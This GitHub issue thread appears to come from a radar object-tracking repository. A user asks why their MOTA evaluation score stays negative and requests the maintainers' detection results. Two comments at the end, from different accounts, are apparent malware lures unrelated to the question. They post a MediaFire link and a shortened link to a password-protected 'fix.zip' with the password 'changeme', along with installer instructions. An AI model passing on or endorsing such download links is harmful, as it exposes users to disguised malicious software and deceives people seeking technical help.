### ISSUE TITLE
About MOTA calculation, followed the https://github.com/xinshuoweng/AB3DMOT.git version.

### ISSUE THREAD

**Issue by LiawWun** [LJacksonPan/RaTrack#12]
Thank you for your response. I have used the suggested code and made modifications based on the following suggestions. I successfully ran the evaluation code, but the MOTA value is still negative.

I removed objects with fewer than 5 radar points (both in the ground truth and model predictions).
I set the confidence threshold to 0.078483.
I merged the labels for bicycles and the person riding them together (following the suggested method).
Additionally, I made a video [my video](https://youtu.be/rM-aTrlbyKk) to show the ground truth and model detection results. In the video, the ground truth is displayed as bounding boxes (for visualization purposes only; in the evaluation code, the calculations are still based on radar points), and the model predictions are represented using different colors.

I compared this video with the one you provided [RaTrack video](https://www.youtube.com/watch?v=IxfyCWyNhfw) and I noticed that in my video, there are a lot of false positives compares to yours, for example, between the 0:14 and 0:31 minute marks,, whereas in your video, between the 0:24 and 0:30 minute marks, there aren’t as many false positives.

**Would it be possible to share the detection results used in your video?** This could help me pinpoint where the discrepancies are arising.

Thank you for your continued assistance.

my email: [jiawunliaw@gmail.com](mailto:jiawunliaw@gmail.com)

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
